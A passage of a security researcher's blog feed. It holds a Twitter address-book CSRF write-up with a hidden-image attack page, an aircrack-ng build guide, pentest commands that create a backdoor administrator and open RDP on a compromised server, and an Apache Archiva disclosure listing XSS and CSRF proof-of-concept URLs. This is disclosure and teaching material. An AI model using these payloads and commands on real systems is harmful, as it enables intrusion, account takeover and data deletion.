&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;2. If he wants to delete ALL his previously imported contacts, he would click on "Remove Contacts" under Settings.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;3. Upon clicking, a GET request is sent to "https://mobile.twitter.com/settings/wipe_addressbook"&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;4. A message is presented that the user's contacts have been removed.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-ps9yIDiBrjE/T7NeA0CbErI/AAAAAAAAAeA/cM_4JUOoekU/s1600/TwitterAddressBookWipe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="350" src="http://3.bp.blogspot.com/-ps9yIDiBrjE/T7NeA0CbErI/AAAAAAAAAeA/cM_4JUOoekU/s640/TwitterAddressBookWipe.png" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;An attacker could take advantage of the absence of any security tokens (CSRF tokens) that would allow the server to authenticate the request, and set up a page (hosted on xyz.com/index.html) similar to the following:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;&lt;br /&gt;
&amp;lt;img src="https://mobile.twitter.com/settings/wipe_addressbook" width="0" height="0" /&amp;gt;&lt;br /&gt;
&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;The victim could then be made to navigate to xyz.com/index.html (via email or some other means) and his address book would be deleted!&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;The form that makes the final request is now protected with an 'authenticity_token', which is random, changes on every login, and without which the request is not processed on the server. An attacker would need to know this value to attack the application via CSRF.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="http://3.bp.blogspot.com/-b0eK8P3MCQU/T7Nfti0PbPI/AAAAAAAAAeI/drQAVJ42Ff8/s1600/new_form_with_csrf_protection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="204" src="http://3.bp.blogspot.com/-b0eK8P3MCQU/T7Nfti0PbPI/AAAAAAAAAeI/drQAVJ42Ff8/s640/new_form_with_csrf_protection.png" width="550" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;This was my ticket to the Twitter Hall of Fame for Security researchers at &lt;a href="http://twitter.com/about/security"&gt;http://twitter.com/about/security&lt;/a&gt;!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/zyrQBf-jgsE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/4444493052577548298/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2012/05/twitter-wipe-addressbook-csrf.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/4444493052577548298?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/4444493052577548298?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/zyrQBf-jgsE/twitter-wipe-addressbook-csrf.html" title="Twitter Wipe Addressbook CSRF Vulnerability" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-ps9yIDiBrjE/T7NeA0CbErI/AAAAAAAAAeA/cM_4JUOoekU/s72-c/TwitterAddressBookWipe.png" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2012/05/twitter-wipe-addressbook-csrf.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A08FRn09fSp7ImA9WhVXFEo.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-2078827739197277861</id><published>2012-04-15T11:11:00.000-07:00</published><updated>2012-04-15T01:50:17.365-07:00</updated><app:edited 
xmlns:app="http://www.w3.org/2007/app">2012-04-15T01:50:17.365-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="CFLAGS" /><category scheme="http://www.blogger.com/atom/ns#" term="airodump" /><category scheme="http://www.blogger.com/atom/ns#" term="aircrack" /><category scheme="http://www.blogger.com/atom/ns#" term="wireless" /><category scheme="http://www.blogger.com/atom/ns#" term="wlan" /><category scheme="http://www.blogger.com/atom/ns#" term="Werror" /><category scheme="http://www.blogger.com/atom/ns#" term="Ubuntu" /><category scheme="http://www.blogger.com/atom/ns#" term="hacking" /><title>Installing Aircrack-ng on Ubuntu 12.04</title><content type="html">One of the primary reasons I use Ubuntu is to crack wireless networks whenever I get the opportunity. I recently moved to Ubuntu 12.04 and found that aircrack-ng was NOT in the repository.&lt;br /&gt;&lt;br /&gt;In the process of compiling aircrack-ng from source, I hit a lot of errors, mostly to do with a compiler flag called -&lt;span style="font-style: italic; "&gt;Werror&lt;/span&gt;. 
This is what you need to do to compile aircrack-ng without the pesky errors.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;sudo apt-get install build-essential
sudo apt-get install libssl-dev
wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1&lt;/pre&gt;&lt;div style="font-style: normal; "&gt;In the aircrack-ng-1.1 directory there is a file called common.mak; open it in your favorite editor and scroll down until you see the following line:&lt;/div&gt;&lt;div style="font-style: normal; "&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-style: normal; "&gt;&lt;pre&gt;CFLAGS          ?= -g -W -Wall -Werror -O3&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;Delete the &lt;i&gt;-Werror&lt;/i&gt; flag (which turns every compiler warning into an error), so that the line now looks like the following. Save and exit.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre&gt;CFLAGS ?= -g -W -Wall -O3&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Run make and make install to get aircrack-ng up and running.&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/MY3PqklgqKg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/2078827739197277861/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2010/12/installing-aircrack-ng-on-ubuntu-1204.html#comment-form" title="104 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2078827739197277861?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2078827739197277861?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/MY3PqklgqKg/installing-aircrack-ng-on-ubuntu-1204.html" 
title="Installing Aircrack-ng on Ubuntu 12.04" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><thr:total>104</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2010/12/installing-aircrack-ng-on-ubuntu-1204.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkUAQ34_eip7ImA9WhdbF0Q.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-4614382535795003047</id><published>2011-10-16T11:30:00.001-07:00</published><updated>2011-10-16T11:37:22.042-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-16T11:37:22.042-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="hacker conference" /><category scheme="http://www.blogger.com/atom/ns#" term="c0c0n" /><category scheme="http://www.blogger.com/atom/ns#" term="security conference" /><category scheme="http://www.blogger.com/atom/ns#" term="CTF" /><category scheme="http://www.blogger.com/atom/ns#" term="cocon" /><category scheme="http://www.blogger.com/atom/ns#" term="2011" /><category scheme="http://www.blogger.com/atom/ns#" term="walkthrough" /><title>C0C0N 2011 - CTF Walkthrough</title><content type="html">&lt;span style="font-family:trebuchet ms;"&gt;I won the recently concluded C0C0N Capture the Flag event at the conference. 
Here's the walkthrough for all the levels on slideshare.&lt;/span&gt;&lt;br /&gt;&lt;div style="width:477px" id="__ss_9722200"&gt; &lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/riyazwalikar/c0c0n-2011-ctf-walkthrough" title="C0c0n 2011 CTF Walkthrough" target="_blank"&gt;C0c0n 2011 CTF Walkthrough&lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/9722200" marginwidth="0" marginheight="0" frameborder="0" height="510" scrolling="no" width="477"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt; View more &lt;a href="http://www.slideshare.net/" target="_blank"&gt;documents&lt;/a&gt; from &lt;a href="http://www.slideshare.net/riyazwalikar" target="_blank"&gt;riyazwalikar&lt;/a&gt; &lt;/div&gt; &lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/9YcII8yTzsg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/4614382535795003047/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2011/10/c0c0n-2011-ctf-walkthrough.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/4614382535795003047?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/4614382535795003047?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/9YcII8yTzsg/c0c0n-2011-ctf-walkthrough.html" title="C0C0N 2011 - CTF Walkthrough" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" 
/></author><thr:total>1</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2011/10/c0c0n-2011-ctf-walkthrough.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0QFQnczeCp7ImA9WhdQFk4.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-2459026693768694354</id><published>2011-08-17T18:16:00.000-07:00</published><updated>2011-08-17T20:48:33.980-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-17T20:48:33.980-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="rdp" /><category scheme="http://www.blogger.com/atom/ns#" term="LFI" /><category scheme="http://www.blogger.com/atom/ns#" term="os" /><category scheme="http://www.blogger.com/atom/ns#" term="remote" /><category scheme="http://www.blogger.com/atom/ns#" term="hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="command execution" /><title>Enable RDP via Command line</title><content type="html">&lt;span style="font-family:trebuchet ms;"&gt;Been extremely busy with loads of work. Anyways, here's something interesting that I needed to do recently at a customer network to gain access to a server.&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I managed to obtain a web application shell to the server and was able to execute commands as Administrator. The application was running off XAMPP under an administrative account, so I was lucky there. But what I needed was GUI access to the desktop because I wanted to compromise another server which was reachable using a custom-programmed application running on the server that I had just gained access to. Here's what I did:&lt;/span&gt;
&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;
&lt;br /&gt;1. Created a user and added it to the local administrators group using these commands:
&lt;br /&gt;&lt;pre&gt;net user newadmin newpa$$w0rd /add
&lt;br /&gt;net localgroup administrators newadmin /add
&lt;br /&gt;net user newadmin
&lt;br /&gt;&lt;/pre&gt;
&lt;br /&gt;2. Used the following commands to enable Remote Desktop and logged in with my credentials:
&lt;br /&gt;&lt;pre&gt;reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
&lt;br /&gt;
&lt;br /&gt;netsh firewall set portopening TCP 3389&lt;/pre&gt;
&lt;br /&gt;3. Bit off a large chunk of some awesome tasting chicken sandwich, sipped some coffee and then proceeded with the rest of the Penetration Test.
&lt;br /&gt;
&lt;br /&gt;A lot of Penetration Testers reach this wall at some point during their assessments. Hope this helps some tired soul like me.
&lt;br /&gt;
&lt;br /&gt;Happy Hacking!
&lt;br /&gt;
&lt;br /&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/f7GE6RX6BWo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/2459026693768694354/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2011/08/enable-rdp-via-command-line.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2459026693768694354?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2459026693768694354?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/f7GE6RX6BWo/enable-rdp-via-command-line.html" title="Enable RDP via Command line" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2011/08/enable-rdp-via-command-line.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0YEQ3g4eSp7ImA9WhZVF0g.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-2428163433958977288</id><published>2011-05-30T04:10:00.000-07:00</published><updated>2011-05-30T04:31:42.631-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-05-30T04:31:42.631-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web application" /><category scheme="http://www.blogger.com/atom/ns#" term="full disclosure" /><category scheme="http://www.blogger.com/atom/ns#" term="csrf" /><category scheme="http://www.blogger.com/atom/ns#" term="bid" /><category 
scheme="http://www.blogger.com/atom/ns#" term="cve" /><category scheme="http://www.blogger.com/atom/ns#" term="xss" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="apache archiva" /><title>Apache Archiva Multiple XSS &amp; CSRF Vulnerabilities</title><content type="html">&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;I am honestly surprised at the frequency and places one would find threats like Cross Site Scripting and Cross Site Request Forgery. Although immensely easy to locate and exploit, it can get quite twisted to fix these issues in large applications. Here's a rundown on another product that was found vulnerable. As part of the vulnerability research that I do with published web applications, I downloaded a copy of Apache's Archiva 1.3.4 which was the latest published edition on the vendor's website. Upon examination, there seemed to be several issues with the application that I reported responsibly to the vendor and co-operated in responsible disclosure. Since the cat is now out of the bag, here's the condensed disclosure document with the exploit code intact.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Title: Multiple XSS &amp;amp; CSRF Vulnerabilities in Apache Archiva 1.3.4&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Project: Apache Archiva&lt;br /&gt;Severity: High&lt;br /&gt;Versions: 1.3.0 - 1.3.4. 
The unsupported versions Archiva 1.0 - 1.2.2 are also affected.&lt;br /&gt;Exploit type: Multiple XSS &amp;amp; CSRF&lt;br /&gt;Mitigation: Archiva 1.3.4 and earlier users should upgrade to 1.3.5&lt;br /&gt;Vendor URL: http://archiva.apache.org/security.html&lt;br /&gt;CVE: CVE-2011-1077, CVE-2011-1026&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Timeline:&lt;br /&gt;28 February 2011: Vendor Contacted&lt;br /&gt;1 March 2011:  Vendor Response received. CVE-2011-1026 for CSRF Issues Assigned.&lt;br /&gt;7 March 2011:  CVE-2011-1077 Assigned for XSS Issues.&lt;br /&gt;14 March 2011: Fixes released to selected channels / Found to be insufficient&lt;br /&gt;27 May 2011: Vendor releases v1.3.5&lt;br /&gt;27 May 2011: Vendor releases security disclosure to Bugtraq and FD.&lt;br /&gt;30 May 2011: Exploit details released on Bugtraq &amp;amp; FD&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Product Description:&lt;br /&gt;Apache Archiva is an extensible repository management software that helps taking care of your own personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as Maven, Continuum, and ANT.&lt;br /&gt;&lt;br /&gt;Archiva offers several capabilities, amongst which remote repository proxying, security access management, build artifact storage, delivery, browsing, indexing and usage reporting, extensible scanning functionality... and many more!&lt;br /&gt;(Source: http://archiva.apache.org/)&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Vulnerability Details:&lt;br /&gt;XSS: User can insert HTML or execute arbitrary JavaScript code within the vulnerable application. 
The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.&lt;br /&gt;Successful exploitation of these vulnerabilities could result in, but is not limited to, compromise of the application, theft of&lt;br /&gt;cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.&lt;br /&gt;&lt;br /&gt;CSRF: These issues allow an attacker to access and use the application with the session of a logged-on user. In this case if an administrative account is exploited, total application compromise may be achieved.&lt;br /&gt;An attacker can build a simple html page containing a hidden Image tag (eg: &amp;lt;img src=vulnurl width=0 height=0 /&amp;gt;) and entice the administrator to access the page.&lt;br /&gt;----------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Proof of Concept:&lt;br /&gt;Reflected XSS:&lt;br /&gt;http://127.0.0.1:8080/archiva/security/useredit.action?username=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/security/roleedit.action?name=%22&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/security/userlist!show.action?roleName=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;artifactId=1&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;version=1&amp;amp;repositoryId=internal&lt;br 
/&gt;http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath!commit.action?legacyArtifactPath.path=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;groupId=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;artifactId=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;version=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;classifier=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;type=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!confirm.action?proxyid=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Persistent (Stored) XSS:&lt;br /&gt;Exploit code: test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/addRepository.action (Identifier:repository.id, Name:repository.name, Directory:repository.location, Index Directory:repository.indexDir)&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/confirmDeleteRepository.action?repoid=&lt;br /&gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/editAppearance.action (Name:organisationName, URL:organisation:URL, LogoURL:organisation:URL)&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/configureAppearance.action&lt;br /&gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath.action (Path:name=legacyArtifactPath.path, GroupId:groupId, ArtifactId:artifactId, Version:version, Classifier:classifier, Type:type)&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/legacyArtifactPath.action&lt;br /&gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/addNetworkProxy.action (Identifier:proxy.id, Protocol:proxy.protocol, Hostname:proxy.host, Port:proxy.port, Username:proxy.username)&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/networkProxies.action&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CSRF:&lt;br 
/&gt;http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.username=tester123&amp;amp;user.fullName=test&amp;amp;user.email=test%40test.com&amp;amp;user.password=abc&amp;amp;user.confirmPassword=abc&lt;br /&gt;http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username=test&lt;br /&gt;http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=test&amp;amp;addRolesButton=true&amp;amp;__checkbox_addNDSelectedRoles=Guest&amp;amp;__checkbox_addNDSelectedRoles=Registered+User&amp;amp;addNDSelectedRoles=System+Administrator&amp;amp;__checkbox_addNDSelectedRoles=System+Administrator&amp;amp;__checkbox_addNDSelectedRoles=User+Administrator&amp;amp;__checkbox_addNDSelectedRoles=Global+Repository+Manager&amp;amp;__checkbox_addNDSelectedRoles=Global+Repository+Observer&amp;amp;submitRolesButton=Submit&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&amp;amp;method%3AdeleteContents=Delete+Configuration+and+Contents&lt;br /&gt;http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&amp;amp;artifactId=1&amp;amp;version=1&amp;amp;repositoryId=snapshots&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repositoryGroup.id=csrfgrp&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGroupId=test&amp;amp;method%3Adelete=Confirm&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action?target=maven2-repository.dev.java.net&amp;amp;source=internal&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?target=maven2-repository.dev.java.net&amp;amp;source=snapshots&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path=jaxen/jars/jaxen-1.0-FCS-full.jar&lt;br 
/&gt;http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&amp;amp;proxy.id=ntwrk&amp;amp;proxy.protocol=http&amp;amp;proxy.host=test&amp;amp;proxy.port=8080&amp;amp;proxy.username=&amp;amp;proxy.password=&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?proxyid=myproxy&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePattern.action?pattern=**/*.rum&amp;amp;fileTypeId=artifacts&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePattern.action?pattern=**/*.rum&amp;amp;fileTypeId=artifacts&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsumers.action?enabledKnownContentConsumers=auto-remove&amp;amp;enabledKnownContentConsumers=auto-rename&amp;amp;enabledKnownContentConsumers=create-missing-checksums&amp;amp;enabledKnownContentConsumers=index-content&amp;amp;enabledKnownContentConsumers=metadata-updater&amp;amp;enabledKnownContentConsumers=repository-purge&amp;amp;enabledKnownContentConsumers=update-db-artifact&amp;amp;enabledKnownContentConsumers=validate-checksums&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.action?enabledUnprocessedConsumers=update-db-project&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.action?enabledCleanupConsumers=not-present-remove-db-artifact&amp;amp;enabledCleanupConsumers=not-present-remove-db-project&amp;amp;enabledCleanupConsumers=not-present-remove-indexed&lt;br /&gt;---------------------------------------------------------------------&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;br /&gt;Please update to Archiva 1.3.5, available for download via the vendor's website.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/J60qf5_M8VY" height="1" 
width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/2428163433958977288/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2011/05/apache-archiva-multiple-xss-csrf.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2428163433958977288?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2428163433958977288?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/J60qf5_M8VY/apache-archiva-multiple-xss-csrf.html" title="Apache Archiva Multiple XSS &amp; CSRF Vulnerabilities" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" 